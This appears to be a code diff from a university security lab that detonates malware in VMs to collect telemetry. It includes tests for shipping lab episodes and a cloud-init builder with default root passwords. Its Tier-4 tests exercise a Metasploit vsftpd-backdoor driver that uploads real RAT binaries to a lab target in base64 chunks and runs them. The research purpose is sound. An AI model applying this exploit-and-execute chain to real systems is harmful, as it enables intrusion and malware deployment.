# ---------------------------------------------------------------------------
# Ping
# ---------------------------------------------------------------------------
def test_ping_returns_ok_against_running_receiver(tmp_path: Path, receiver) -> None:
url, _ = receiver
_, transport, _ = _make_shipper(tmp_path, url)
res = transport.ping()
assert res.ok is True
assert res.status_code == 200
assert res.body is not None
assert res.body["ok"] is True
assert res.body["host_id"] == "lab1"
assert res.body["schema_version"] == 1
def test_ping_writes_nothing_to_index(tmp_path: Path, receiver) -> None:
url, store = receiver
_, transport, _ = _make_shipper(tmp_path, url)
transport.ping()
transport.ping()
transport.ping()
assert store.index_path.read_text() == ""
def test_ping_fails_with_wrong_bearer(tmp_path: Path, receiver_with_bearer) -> None:
url, _ = receiver_with_bearer
_, transport, _ = _make_shipper(tmp_path, url, bearer="WRONG")
res = transport.ping()
assert res.ok is False
assert res.status_code == 401
def test_ping_succeeds_with_right_bearer(tmp_path: Path, receiver_with_bearer) -> None:
url, _ = receiver_with_bearer
_, transport, _ = _make_shipper(tmp_path, url, bearer="s3cret")
res = transport.ping()
assert res.ok is True
assert res.status_code == 200
def test_ping_fails_when_receiver_unreachable(tmp_path: Path) -> None:
# Pick a free port and don't bind it — connect must fail.
port = _free_port()
_, transport, _ = _make_shipper(tmp_path, f"http://127.0.0.1:{port}")
res = transport.ping()
assert res.ok is False
assert res.status_code == 0
assert res.error is not None
# ---------------------------------------------------------------------------
# Tar + ship
# ---------------------------------------------------------------------------
def test_run_once_ships_one_done_episode(tmp_path: Path, receiver) -> None:
url, store = receiver
cfg, _, queue = _make_shipper(tmp_path, url)
_make_episode(cfg, "01EPISODE")
result = queue.run_once()
assert result.scanned == 1
assert result.shipped == 1
assert result.transient_failures == 0
# Episode dir moved to shipped/.
assert not (cfg.episodes_dir / "01EPISODE").exists()
assert (cfg.shipped_dir / "01EPISODE").exists()
# Outbox tarball cleaned up.
assert list(cfg.outbox_dir.iterdir()) == []
# Receiver stored it and indexed it.
assert store.final_path("lab1", "01EPISODE").exists()
rows = [json.loads(l) for l in store.index_path.read_text().splitlines()]
assert len(rows) == 1
assert rows[0]["host_id"] == "lab1"
assert rows[0]["episode_id"] == "01EPISODE"
def test_run_once_skips_episodes_without_done_marker(tmp_path: Path, receiver) -> None:
url, store = receiver
cfg, _, queue = _make_shipper(tmp_path, url)
ep = cfg.episodes_dir / "01PARTIAL"
ep.mkdir(parents=True)
(ep / "meta.json").write_text("{}")
# Note: NO done.marker.
result = queue.run_once()
assert result.scanned == 0
assert result.shipped == 0
assert ep.exists() # untouched
assert store.index_path.read_text() == ""
def test_run_once_idempotent_re_ship_returns_already_present(tmp_path: Path, receiver) -> None:
"""If a prior run shipped an episode but crashed before retiring it,
the next run must re-ship the same bytes successfully (200) and
retire the dir, not flag it as a conflict."""
url, store = receiver
cfg, _, queue = _make_shipper(tmp_path, url)
_make_episode(cfg, "01REPLAY", content=b"same-bytes")
queue.run_once()
assert (cfg.shipped_dir / "01REPLAY").exists()
# Simulate a crash: move it back as if retire never happened.
(cfg.shipped_dir / "01REPLAY").rename(cfg.episodes_dir / "01REPLAY")
result = queue.run_once()
assert result.scanned == 1
assert result.shipped == 1
assert (cfg.shipped_dir / "01REPLAY").exists()
# Index didn't double up.
rows = store.index_path.read_text().splitlines()
assert len(rows) == 1
def test_run_once_handles_409_conflict(tmp_path: Path, receiver) -> None:
"""If the same episode_id was previously shipped with *different*
bytes, the receiver returns 409 and the shipper must NOT retire
the local dir; operator triage is required."""
url, _ = receiver
cfg, _, queue = _make_shipper(tmp_path, url)
_make_episode(cfg, "01CONFLICT", content=b"first")
result = queue.run_once()
assert result.shipped == 1
# Simulate a re-do with different content but the same id (e.g., a
# botched re-run on the lab host).
(cfg.shipped_dir / "01CONFLICT").rename(cfg.episodes_dir / "01CONFLICT")
(cfg.episodes_dir / "01CONFLICT" / "meta.json").write_bytes(b"tampered")
result = queue.run_once()
assert result.scanned == 1
assert result.shipped == 0
assert result.conflicts == 1
# Local dir survives — operator can decide what to do.
assert (cfg.episodes_dir / "01CONFLICT").exists()
def test_run_once_handles_transient_when_receiver_is_down(tmp_path: Path) -> None:
port = _free_port()
cfg, _, queue = _make_shipper(tmp_path, f"http://127.0.0.1:{port}")
_make_episode(cfg, "01DOWN")
result = queue.run_once()
assert result.scanned == 1
assert result.shipped == 0
assert result.transient_failures == 1
# Episode dir + tarball both stay in place for the next pass.
assert (cfg.episodes_dir / "01DOWN").exists()
assert (cfg.outbox_dir / "01DOWN.tar.zst").exists()
def test_tarball_round_trips_episode_dir(tmp_path: Path, receiver) -> None:
"""The receiver-side tarball must extract back to the original
episode dir layout (modulo file order). Verifies the tar+zstd
pipe is intact."""
import subprocess
import tarfile
url, _ = receiver
cfg, _, queue = _make_shipper(tmp_path, url)
ep = _make_episode(cfg, "01ROUND", content=b"meta-bytes")
expected_files = sorted(p.name for p in ep.iterdir())
queue.run_once()
# The receiver stored it; pull the bytes back, decompress + untar.
rcv_path = next((tmp_path / "rcv-episodes" / "lab1").glob("01ROUND.tar.zst"))
decompressed = tmp_path / "01ROUND.tar"
subprocess.check_call(
["zstd", "-q", "-d", "-o", str(decompressed), str(rcv_path)],
)
extract_dir = tmp_path / "extracted"
extract_dir.mkdir()
with tarfile.open(decompressed) as tf:
tf.extractall(extract_dir)
got_files = sorted(p.name for p in (extract_dir / "01ROUND").iterdir())
assert got_files == expected_files
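
The conflict and transient-failure tests above imply a three-way outcome for every upload attempt. The following is a minimal sketch of that decision, assuming an in-memory receiver that keys on `episode_id` and compares SHA-256 digests. `InMemoryReceiver`, `classify`, and the 201/200 status codes for first and repeated uploads are hypothetical; only the 409 is taken from the tests, and the real receiver and shipper code are not shown in this part of the diff.

```python
from __future__ import annotations

import hashlib


class InMemoryReceiver:
    """Hypothetical stand-in for the receiver's idempotency rule."""

    def __init__(self) -> None:
        # episode_id -> sha256 hex digest of the bytes first stored under it
        self._digests: dict[str, str] = {}

    def put(self, episode_id: str, payload: bytes) -> int:
        digest = hashlib.sha256(payload).hexdigest()
        known = self._digests.get(episode_id)
        if known is None:
            self._digests[episode_id] = digest
            return 201  # assumed status for a first upload
        if known == digest:
            return 200  # assumed status for an identical re-upload
        return 409  # same id, different bytes


def classify(status: int | None) -> str:
    """Map an upload result to what the shipper should do locally.

    ``None`` models "no response at all" (receiver down).
    """
    if status is None:
        return "transient"  # keep episode dir and tarball, retry next pass
    if status in (200, 201):
        return "shipped"  # safe to retire the local dir
    if status == 409:
        return "conflict"  # keep the local dir for operator triage
    return "transient"  # anything else: assume retryable


receiver = InMemoryReceiver()
first = classify(receiver.put("01CONFLICT", b"first"))
again = classify(receiver.put("01CONFLICT", b"first"))
clash = classify(receiver.put("01CONFLICT", b"tampered"))
down = classify(None)
```

Treating unknown statuses as transient is a design choice made for this sketch; it errs on the side of keeping local data.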

tests/test_tier4.py Normal file

@ -0,0 +1,258 @@
"""Tests for the Tier-4 path:
- real_binary_workload constructs valid shell commands
- Sample.binary_path resolves correctly
- MSFExploitDriver real-sample dispatch picks the upload+exec path
when a binary is staged, and the mimic path when it isn't
- tools/fetch_sample input validation (we don't hit the live API)
"""
from __future__ import annotations
import hashlib
from pathlib import Path
import pytest
from exploits.driver import DriverConfig, MSFExploitDriver
from exploits.modules import load_module_config
from exploits.workloads import (
chunked_real_binary_upload, real_binary_workload,
)
from samples.manifest import Sample
REPO_ROOT = Path(__file__).resolve().parent.parent
MODULES_DIR = REPO_ROOT / "exploits" / "modules"
# Reuse the FakeMSFRpcClient from test_exploits.py.
from tests.test_exploits import FakeMSFRpcClient # noqa: E402
# ---------------------------------------------------------------------------
# real_binary_workload
# ---------------------------------------------------------------------------
def test_real_binary_workload_embeds_base64() -> None:
payload = b"\x7fELF" + b"\x00" * 64 # tiny ELF-shaped header
w = real_binary_workload(payload)
# Start command bundles a chunked upload (printf '%s' '<b64>' >> file).
# Pull all b64 segments out and confirm they round-trip.
import base64 as _b64
import re
matches = re.findall(r"printf '%s' '([A-Za-z0-9+/=]+)'", w.start_cmd)
assert matches, "expected printf-based b64 chunks in start_cmd"
decoded = _b64.b64decode("".join(matches))
assert decoded == payload
def test_chunked_real_binary_upload_splits_correctly() -> None:
"""A binary larger than the chunk size should produce >1 chunks
plus a finalize + exec. Each chunk's payload must be individually
valid base64 and the concatenation must round-trip."""
import base64 as _b64
import hashlib as _hashlib
import re
# Build a payload large enough to force multiple chunks.
payload = (b"\x90\xab" * 8000)
plan = chunked_real_binary_upload(payload)
assert plan.n_chunks >= 3 # 1 init + 2+ data chunks
assert plan.expected_sha256 == _hashlib.sha256(payload).hexdigest()
# Reconstruct from chunks.
segs = []
for c in plan.chunks:
m = re.search(r"printf '%s' '([A-Za-z0-9+/=]+)'", c)
if m:
segs.append(m.group(1))
assert segs, "no data chunks parsed"
decoded = _b64.b64decode("".join(segs))
assert decoded == payload
# finalize_cmd verifies the sha256 we computed.
assert plan.expected_sha256 in plan.finalize_cmd
assert "sha256sum" in plan.finalize_cmd
def test_real_binary_workload_stop_kills_pidfile() -> None:
w = real_binary_workload(b"x" * 16)
assert "kill" in w.stop_cmd
assert ".cis490-real" in w.stop_cmd
def test_real_binary_workload_per_profile_isolation() -> None:
a = real_binary_workload(b"\x00", sample=Sample(name="a", family="A", category="rat", profile="cpu-saturate"))
b = real_binary_workload(b"\x00", sample=Sample(name="b", family="B", category="rat", profile="bursty-c2"))
# Different profiles → different /tmp paths so concurrent samples
# don't stomp each other in the same guest.
assert a.profile != b.profile
assert a.start_cmd != b.start_cmd
# ---------------------------------------------------------------------------
# Sample.binary_path
# ---------------------------------------------------------------------------
def test_binary_path_resolves_when_staged(tmp_path: Path) -> None:
sha = "a" * 64
(tmp_path / sha).write_bytes(b"hello")
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate", sha256=sha)
assert s.binary_path(tmp_path) == tmp_path / sha
def test_binary_path_none_when_missing(tmp_path: Path) -> None:
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate", sha256="b" * 64)
assert s.binary_path(tmp_path) is None
def test_binary_path_none_for_mimic_sample(tmp_path: Path) -> None:
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate")
assert s.binary_path(tmp_path) is None
# ---------------------------------------------------------------------------
# Driver dispatch
# ---------------------------------------------------------------------------
def test_driver_picks_real_binary_when_staged(tmp_path: Path) -> None:
payload = b"\x7fELF\x02" + b"\x00" * 60
sha = hashlib.sha256(payload).hexdigest()
(tmp_path / sha).write_bytes(payload)
sample = Sample(
name="real-x", family="X", category="rat",
profile="cpu-saturate", sha256=sha,
)
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
driver = MSFExploitDriver(
client=client, # type: ignore[arg-type]
module=cfg,
cfg=DriverConfig(
target_ip="10.200.0.10",
session_open_timeout_s=0.5,
sample_store_root=tmp_path,
),
emit_event=lambda *a, **kw: None,
sample=sample,
)
# Driver picks the chunked-upload path.
assert driver.workload is not None
assert driver.workload.profile.startswith("real:")
assert driver._chunked is not None
assert driver._chunked.expected_sha256 == sha
def test_driver_walks_chunked_upload_in_session(tmp_path: Path) -> None:
"""End-to-end: at infected_running, the driver should issue every
chunk + finalize + exec as separate shell_write calls. The fake
client records them in order so we can verify."""
payload = b"\xde\xad\xbe\xef" * 4096 # 16 KiB → multiple chunks
sha = hashlib.sha256(payload).hexdigest()
(tmp_path / sha).write_bytes(payload)
sample = Sample(
name="real-multi", family="X", category="rat",
profile="bursty-c2", sha256=sha,
)
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
# Patch the fake to return "sha-ok" so the verify step passes.
client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
client._verify_response = "sha-ok\n"
real_read = client.session_shell_read
def shell_read_with_verify(sid):
# Return verify token after the finalize command — i.e. once
# the most recent shell_write contained "sha256sum".
last = client.shell_writes[-1][1] if client.shell_writes else ""
if "sha256sum" in last:
return "sha-ok\n"
return real_read(sid)
client.session_shell_read = shell_read_with_verify # type: ignore[assignment]
events: list[tuple[str, dict]] = []
driver = MSFExploitDriver(
client=client, # type: ignore[arg-type]
module=cfg,
cfg=DriverConfig(
target_ip="10.200.0.10",
session_open_timeout_s=0.5,
sample_store_root=tmp_path,
),
emit_event=lambda ev, **kw: events.append((ev, kw)),
sample=sample,
)
driver.setup()
driver.set_phase("armed")
driver.set_phase("infecting")
driver.set_phase("infected_running")
# All chunks + finalize + exec went through shell_write.
writes = [w for (_, w) in client.shell_writes]
n_printf = sum(1 for w in writes if w.startswith("printf '%s'"))
n_finalize = sum(1 for w in writes if "sha256sum" in w)
n_exec = sum(1 for w in writes if "nohup" in w and ".cis490-real" in w)
assert n_printf >= 2, f"expected multiple chunks, saw {n_printf}"
assert n_finalize == 1
assert n_exec == 1
# Events tell the same story.
names = [e for (e, _) in events]
assert "real_binary_upload_begin" in names
assert "real_binary_verify" in names
assert any(e == "sample_executed" and kw.get("kind") == "real"
for (e, kw) in events)
def test_driver_falls_back_to_mimic_when_real_binary_missing(tmp_path: Path) -> None:
sample = Sample(
name="real-but-missing", family="X", category="rat",
profile="bursty-c2", sha256="c" * 64,
)
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
driver = MSFExploitDriver(
client=client, # type: ignore[arg-type]
module=cfg,
cfg=DriverConfig(
target_ip="10.200.0.10",
session_open_timeout_s=0.5,
sample_store_root=tmp_path, # empty
),
emit_event=lambda *a, **kw: None,
sample=sample,
)
# Mimic workload selected because the binary isn't staged.
assert driver.workload is not None
assert driver.workload.profile == "bursty-c2"
assert "real:" not in driver.workload.profile
# ---------------------------------------------------------------------------
# Fetcher input validation
# ---------------------------------------------------------------------------
def test_fetch_sample_rejects_bad_sha(tmp_path: Path) -> None:
from tools.fetch_sample import fetch_sample
with pytest.raises(ValueError, match="64 hex chars"):
fetch_sample("not-a-hash", tmp_path, api_key="x")
def test_fetch_sample_returns_existing_when_hash_matches(tmp_path: Path) -> None:
from tools.fetch_sample import fetch_sample
payload = b"already staged bytes"
sha = hashlib.sha256(payload).hexdigest()
p = tmp_path / sha
p.write_bytes(payload)
# api_key is unused on the cached path; pass anything.
out = fetch_sample(sha, tmp_path, api_key="ignored")
assert out == p
# File untouched.
assert p.read_bytes() == payload
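
The chunked-upload tests above check three properties: the base64 segments concatenate back to the payload, the plan carries the payload's SHA-256, and the finalize command verifies it. A rough sketch of a plan builder with those properties follows. `UploadPlan`, `plan_upload`, the destination path, and the chunk size are hypothetical names and values chosen for illustration; the actual `chunked_real_binary_upload` implementation is not part of this diff section and may differ. The shell strings are only constructed here, not executed.

```python
from __future__ import annotations

import base64
import hashlib
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class UploadPlan:
    chunks: list[str]      # shell commands, sent one per write
    finalize_cmd: str      # decode + verify step
    expected_sha256: str


def plan_upload(
    payload: bytes,
    dest: str = "/tmp/.example-upload",  # hypothetical guest path
    raw_chunk: int = 3 * 1024,           # bytes of payload per chunk
) -> UploadPlan:
    # Chunking on a multiple of 3 bytes keeps base64 padding out of every
    # chunk except the last, so the segments can be concatenated safely.
    if raw_chunk <= 0 or raw_chunk % 3:
        raise ValueError("raw_chunk must be a positive multiple of 3")
    b64_path = dest + ".b64"
    chunks = [f": > {b64_path}"]  # init step: truncate the staging file
    for off in range(0, len(payload), raw_chunk):
        seg = base64.b64encode(payload[off:off + raw_chunk]).decode("ascii")
        chunks.append(f"printf '%s' '{seg}' >> {b64_path}")
    sha = hashlib.sha256(payload).hexdigest()
    finalize_cmd = (
        f"base64 -d {b64_path} > {dest} && "
        f"[ \"$(sha256sum < {dest} | cut -d' ' -f1)\" = \"{sha}\" ] && echo sha-ok"
    )
    return UploadPlan(chunks=chunks, finalize_cmd=finalize_cmd, expected_sha256=sha)


payload = bytes(range(256)) * 40  # 10240 bytes
plan = plan_upload(payload)

# Rebuild the payload from the printf segments, as the tests do.
segments = re.findall(r"printf '%s' '([A-Za-z0-9+/=]+)'", "\n".join(plan.chunks))
decoded = base64.b64decode("".join(segments))
```

Because the base64 alphabet contains no single quotes, the segments can sit inside single-quoted shell strings without further escaping.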


@ -0,0 +1,213 @@
"""Tests for VMLoadController against a fake SerialClient.
The controller's only job is to translate phases into shell commands
on a serial console + emit audit events. The key invariants we
encode here come from the elliott-lab incident where every phase
median'd 20% CPU because the workload silently never fired:
- every set_phase emits some event (so absence in events.jsonl is
a hard signal)
- infected_running emits workload_started AFTER sending the load
command
- dormant emits workload_killed WITH a pre_kill_probe so trainers
can detect "the workload was never running"
- exceptions in the shell call surface as workload_failed; they
do NOT propagate (the runner's on_phase callback would swallow
them anyway, but we want the audit row regardless)
"""
from __future__ import annotations
import sys
from pathlib import Path
import pytest
# Mirror the same path hack run_real_vm_demo.py uses so the tools/
# module imports work.
ROOT = Path(__file__).resolve().parent.parent
sys.path.insert(0, str(ROOT))
sys.path.insert(0, str(ROOT / "tools"))
from samples.manifest import Sample
from vm_load_controller import VMLoadController # noqa: E402
class FakeSerial:
"""Records every shell command. Returns canned probe output."""
def __init__(self, probe_response: str = "yes=1\nsh=1\nloadavg=0.45") -> None:
self.calls: list[str] = []
self.probe_response = probe_response
self.fail_on: list[str] = []
def run(self, cmd: str, timeout_s: float = 10.0) -> str:
self.calls.append(cmd)
for substr in self.fail_on:
if substr in cmd:
raise RuntimeError(f"fake-serial: failing on {substr!r}")
if "pgrep -c yes" in cmd or "pgrep -c sh" in cmd or "loadavg" in cmd:
return self.probe_response
return ""
# ---------------------------------------------------------------------------
# Event emission — the audit trail
# ---------------------------------------------------------------------------
def test_setup_emits_workload_setup_event() -> None:
serial = FakeSerial()
events: list[tuple[str, dict]] = []
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
c.setup()
names = [e for e, _ in events]
assert "workload_setup" in names
setup = next(kw for e, kw in events if e == "workload_setup")
assert setup["profile"] == "v1-yes" # no Sample → fallback path
assert setup["sample"] is None
def test_setup_records_profile_when_sample_present() -> None:
serial = FakeSerial()
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate")
events: list[tuple[str, dict]] = []
c = VMLoadController(serial, sample=s, emit_event=lambda e, **kw: events.append((e, kw)))
c.setup()
setup = next(kw for e, kw in events if e == "workload_setup")
assert setup["profile"] == "cpu-saturate"
assert setup["sample"] == "x"
def test_infected_running_emits_workload_started_after_command() -> None:
serial = FakeSerial()
events: list[tuple[str, dict]] = []
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
c.set_phase("infected_running")
# The command was sent.
assert any("yes > /dev/null" in cmd for cmd in serial.calls), \
f"expected v1 yes-loop in serial calls; got {serial.calls}"
# And the audit event followed it.
started = [kw for e, kw in events if e == "workload_started"]
assert started, "workload_started event must fire"
assert started[0]["phase"] == "infected_running"
assert started[0]["profile"] == "v1-yes"
def test_dormant_probes_before_killing() -> None:
"""The pre_kill_probe is the load-bearing diagnostic: it tells the
trainer whether the workload was actually running before we
killed it. If pgrep returns 0 yes processes, the previous
infected_running was a no-op and the episode is filterable."""
serial = FakeSerial(probe_response="yes=2\nsh=1\nloadavg=1.32")
events: list[tuple[str, dict]] = []
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
c.set_phase("dormant")
killed = [kw for e, kw in events if e == "workload_killed" and kw["phase"] == "dormant"]
assert killed, "dormant must emit workload_killed"
probe = killed[0].get("pre_kill_probe")
assert probe is not None
assert probe["yes"] == "2"
assert probe["loadavg"] == "1.32"
def test_dormant_probe_records_zero_when_workload_never_ran() -> None:
"""The exact symptom from elliott-lab: dormant probe shows 0
yes processes, so the trainer can flag this episode as workload-not-firing."""
serial = FakeSerial(probe_response="yes=0\nsh=1\nloadavg=0.18")
events: list[tuple[str, dict]] = []
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
c.set_phase("dormant")
killed = next(kw for e, kw in events if e == "workload_killed" and kw["phase"] == "dormant")
assert killed["pre_kill_probe"]["yes"] == "0"
def test_clean_phase_emits_workload_killed() -> None:
serial = FakeSerial()
events: list[tuple[str, dict]] = []
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
c.set_phase("clean")
assert any(
e == "workload_killed" and kw["phase"] == "clean" for e, kw in events
), "clean must emit workload_killed"
def test_armed_emits_workload_armed_with_handshake_command() -> None:
serial = FakeSerial()
events: list[tuple[str, dict]] = []
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
c.set_phase("armed")
assert any("armed-handshake" in cmd for cmd in serial.calls)
assert any(e == "workload_armed" for e, _ in events)
def test_infecting_emits_workload_infecting_with_dd() -> None:
serial = FakeSerial()
events: list[tuple[str, dict]] = []
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
c.set_phase("infecting")
assert any("dd if=/dev/urandom" in cmd for cmd in serial.calls)
assert any(e == "workload_infecting" for e, _ in events)
# ---------------------------------------------------------------------------
# Exception handling — failures must surface as events, not propagate
# ---------------------------------------------------------------------------
def test_command_failure_emits_workload_failed_and_does_not_raise() -> None:
"""If the serial.run() raises (timeout, EOF, login bad), the
runner would silently swallow the exception. We want a hard
audit row in events.jsonl regardless."""
serial = FakeSerial()
serial.fail_on = ["yes > /dev/null"]
events: list[tuple[str, dict]] = []
c = VMLoadController(serial, emit_event=lambda e, **kw: events.append((e, kw)))
# Must NOT raise.
c.set_phase("infected_running")
failed = [kw for e, kw in events if e == "workload_failed"]
assert failed, "expected workload_failed event"
assert failed[0]["phase"] == "infected_running"
assert "fake-serial" in failed[0]["error"]
# ---------------------------------------------------------------------------
# Profile dispatch — Sample-driven workload picks the right command
# ---------------------------------------------------------------------------
def test_sample_with_profile_uses_workloads_module_command() -> None:
"""When constructed with a Sample, infected_running runs the
profile's start_cmd (from exploits.workloads) — NOT the v1 yes-loop."""
s = Sample(name="x", family="X", category="cryptominer", profile="cpu-saturate")
serial = FakeSerial()
events: list[tuple[str, dict]] = []
c = VMLoadController(serial, sample=s, emit_event=lambda e, **kw: events.append((e, kw)))
c.set_phase("infected_running")
# The sample's workload script + the post-kill yes sweep both ran.
# The new workload is profile-shaped, not the simple yes-loop.
profile_command_seen = any(".cis490-workload-cpu-saturate" in cmd for cmd in serial.calls)
assert profile_command_seen, f"expected workload script in serial calls; got {serial.calls}"
started = next(kw for e, kw in events if e == "workload_started")
assert started["profile"] == "cpu-saturate"
assert started["sample"] == "x"
# ---------------------------------------------------------------------------
# Default emit (no callback supplied) is a no-op
# ---------------------------------------------------------------------------
def test_no_emit_callback_is_safe() -> None:
"""Tests + code paths that don't pass an emitter shouldn't
crash. The default is a no-op lambda."""
serial = FakeSerial()
c = VMLoadController(serial)
# Should not raise.
c.setup()
c.set_phase("infected_running")
c.set_phase("dormant")
c.set_phase("clean")
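
The invariants these tests encode (a failure becomes an audit event instead of an exception, and a probe is recorded before the kill) can be sketched in a few lines. This is an illustrative reduction, not the real `VMLoadController`: `MiniController`, `parse_probe`, and the literal `"probe"` and `"kill"` commands are hypothetical, and the probe format is assumed from the `yes=2\nsh=1\nloadavg=1.32` strings used by `FakeSerial`.

```python
from __future__ import annotations

from typing import Any, Callable


def parse_probe(text: str) -> dict[str, str]:
    """Parse ``key=value`` lines such as ``yes=2`` into a dict of strings."""
    out: dict[str, str] = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep:  # skip lines without an '='
            out[key.strip()] = value.strip()
    return out


class MiniController:
    """Hypothetical reduction of the controller's audit behaviour."""

    def __init__(
        self,
        run: Callable[[str], str],
        emit_event: Callable[..., None] | None = None,
    ) -> None:
        self._run = run
        # Default emitter is a no-op so callers may omit it.
        self._emit = emit_event or (lambda event, **fields: None)

    def start(self, cmd: str) -> None:
        try:
            self._run(cmd)
        except Exception as exc:
            # Record the failure instead of letting it propagate.
            self._emit("workload_failed", phase="infected_running", error=str(exc))
            return
        # Emitted only after the command was sent successfully.
        self._emit("workload_started", phase="infected_running")

    def stop(self) -> None:
        probe = parse_probe(self._run("probe"))  # probe BEFORE killing
        self._run("kill")
        self._emit("workload_killed", phase="dormant", pre_kill_probe=probe)


events: list[tuple[str, dict[str, Any]]] = []


def failing_run(cmd: str) -> str:
    raise RuntimeError("fake-serial: boom")


def idle_run(cmd: str) -> str:
    return "yes=0\nsh=1\nloadavg=0.18" if cmd == "probe" else ""


record = lambda event, **fields: events.append((event, fields))
MiniController(failing_run, record).start("yes > /dev/null &")
MiniController(idle_run, record).stop()
```

A consumer of the event log could then treat a `workload_killed` row whose `pre_kill_probe["yes"]` is `"0"` as evidence that the workload never ran.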


@ -28,7 +28,7 @@ from pathlib import Path
import pycdlib
DEFAULT_USER_DATA = """\
DEFAULT_USER_DATA_HEAD = """\
#cloud-config
hostname: cis490
manage_etc_hosts: true
@ -45,10 +45,70 @@ chpasswd:
list: |
root:cis490
cis490:cis490
runcmd:
- [ sh, -c, "echo CIS490_BOOT_OK > /tmp/.cis490-boot" ]
"""
# OpenRC service file shipped inside the guest. Alpine uses OpenRC;
# the runcmd at the bottom of user-data wires it up on first boot.
OPENRC_SERVICE = """\
#!/sbin/openrc-run
description="CIS490 in-guest telemetry agent"
command="/usr/local/bin/cis490-agent"
command_args="--port /dev/virtio-ports/cis490.guest.agent"
command_background=true
pidfile="/run/cis490-agent.pid"
output_log="/var/log/cis490-agent.log"
error_log="/var/log/cis490-agent.log"
depend() {
need localmount
}
"""
DEFAULT_META_DATA = """\
instance-id: cis490-vm-001
local-hostname: cis490
"""
def _indent(text: str, n: int) -> str:
pad = " " * n
return "\n".join(pad + line if line else line for line in text.splitlines())
def build_user_data(*, embed_agent: bool, agent_path: Path | None) -> bytes:
"""Build a cloud-init user-data document. When ``embed_agent`` is
True, also stuff the in-guest agent + an OpenRC service into
``write_files`` and arrange to start the service on first boot."""
head = DEFAULT_USER_DATA_HEAD
if not embed_agent:
return (head + 'runcmd:\n - [ sh, -c, "echo CIS490_BOOT_OK > /tmp/.cis490-boot" ]\n').encode()
if agent_path is None:
agent_path = Path(__file__).resolve().parent.parent / "vm" / "guest-agent" / "cis490_agent.py"
if not agent_path.exists():
raise FileNotFoundError(f"agent script not found: {agent_path}")
agent_src = agent_path.read_text()
body = head + (
"write_files:\n"
" - path: /usr/local/bin/cis490-agent\n"
" permissions: '0755'\n"
" owner: root:root\n"
" content: |\n"
f"{_indent(agent_src, 6)}\n"
" - path: /etc/init.d/cis490-agent\n"
" permissions: '0755'\n"
" owner: root:root\n"
" content: |\n"
f"{_indent(OPENRC_SERVICE, 6)}\n"
"runcmd:\n"
' - [ sh, -c, "echo CIS490_BOOT_OK > /tmp/.cis490-boot" ]\n'
' - [ sh, -c, "command -v rc-update >/dev/null && rc-update add cis490-agent default || true" ]\n'
' - [ sh, -c, "command -v rc-service >/dev/null && rc-service cis490-agent start || true" ]\n'
)
return body.encode()
DEFAULT_META_DATA = """\
instance-id: cis490-vm-001
local-hostname: cis490
@ -93,11 +153,26 @@ def main() -> int:
default=None,
help="path to a custom meta-data file",
)
parser.add_argument(
"--no-embed-agent",
action="store_true",
help="don't bake the in-guest agent into user-data",
)
parser.add_argument(
"--agent-path",
type=Path,
default=None,
help="path to the in-guest agent (default: vm/guest-agent/cis490_agent.py)",
)
args = parser.parse_args()
user_data = (
args.user_data.read_bytes() if args.user_data else DEFAULT_USER_DATA.encode()
)
if args.user_data:
user_data = args.user_data.read_bytes()
else:
user_data = build_user_data(
embed_agent=not args.no_embed_agent,
agent_path=args.agent_path,
)
meta_data = (
args.meta_data.read_bytes() if args.meta_data else DEFAULT_META_DATA.encode()
)
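
Embedding a script in cloud-init `write_files` depends on indenting the script body consistently under a YAML literal block (`content: |`). A small sketch of that step follows, using the standard library's `textwrap.indent` in place of the `_indent` helper from this diff. `render_write_file`, the example path, and the exact indentation widths (2, 4, and 6 spaces) are assumptions for illustration, since the rendered diff has collapsed the original whitespace.

```python
import textwrap


def render_write_file(path: str, content: str, permissions: str = "0755") -> str:
    """Render one ``write_files`` list entry with ``content`` as a literal block."""
    # textwrap.indent leaves whitespace-only lines unprefixed by default,
    # which is acceptable inside a YAML literal block scalar.
    body = textwrap.indent(content, " " * 6)
    if not body.endswith("\n"):
        body += "\n"
    return (
        f"  - path: {path}\n"
        f"    permissions: '{permissions}'\n"
        f"    owner: root:root\n"
        f"    content: |\n"
        f"{body}"
    )


script = "#!/bin/sh\n\necho hello\n"
fragment = "write_files:\n" + render_write_file("/usr/local/bin/hello", script)

# Recover the embedded script by stripping the common indentation again.
block = fragment.split("    content: |\n", 1)[1]
recovered = textwrap.dedent(block)
```

One caveat for this approach: a script whose first line begins with whitespace would need an explicit YAML indentation indicator, which the sketch does not handle.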

tools/cis490_doctor.py Normal file

@ -0,0 +1,638 @@
"""``cis490-doctor`` — single-command diagnostic for a lab host or receiver.
Walks the full bring-up stack from the bottom up and prints a
green/yellow/red checklist with the exact command that fixes each
red row. Run this whenever:
- you just cloned the repo and aren't sure what's missing
- you ran install-lab-host.sh but `index.jsonl` on the Pi is empty
- somebody filed an issue saying "shipping isn't working"
Usage:
uv run python tools/cis490_doctor.py # human output
uv run python tools/cis490_doctor.py --json # machine-readable
uv run python tools/cis490_doctor.py --role lab-host # default
uv run python tools/cis490_doctor.py --role receiver
Exits non-zero if any RED check fails.
"""
from __future__ import annotations
import argparse
import dataclasses
import json
import os
import shutil
import socket
import ssl
import subprocess
import sys
import tomllib
from dataclasses import dataclass, field
from pathlib import Path
# ANSI color codes; auto-disable on non-tty.
def _supports_color() -> bool:
return sys.stdout.isatty() and os.environ.get("NO_COLOR") is None
_ANSI_GREEN = "\033[32m" if _supports_color() else ""
_ANSI_YELLOW = "\033[33m" if _supports_color() else ""
